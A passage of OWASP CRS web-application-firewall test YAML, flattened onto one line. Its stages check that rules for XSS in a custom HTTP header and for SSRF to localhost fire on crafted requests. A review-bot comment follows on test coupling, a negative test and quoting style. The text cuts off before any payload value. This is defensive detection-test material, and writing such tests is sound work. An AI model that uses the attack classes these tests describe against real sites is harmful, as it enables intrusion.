127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Remote-ip: "" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 12 + desc: XSS in Custom HTTP header + stages: + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Remote-ip: "
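Review bot: Test 17 asserts `expect_ids: [934110, 934190]`, so this new file fails whenever 934110 stops matching `http://localhost/` even though only 934190 is under test here; either drop 934110 from the expectation or add a comment such as `# 934110 also fires on the scheme form; keep in sync with 934110.yaml` so the coupling is deliberate. Test 20 pins that a bare `localhost` without a trailing slash does not trigger the rule, which records a scope decision rather than a defect; a one-line comment above it stating why the trailing slash is required would stop a later reader from either loosening the rule without updating this test or treating the negative test as a gap to close blindly. On style, this file quotes `dest_addr: "127.0.0.1"` and `version: "HTTP/1.1"` while the sibling 934140.yaml in the same commit leaves both unquoted; they parse identically, but one convention per test directory is easier to lint.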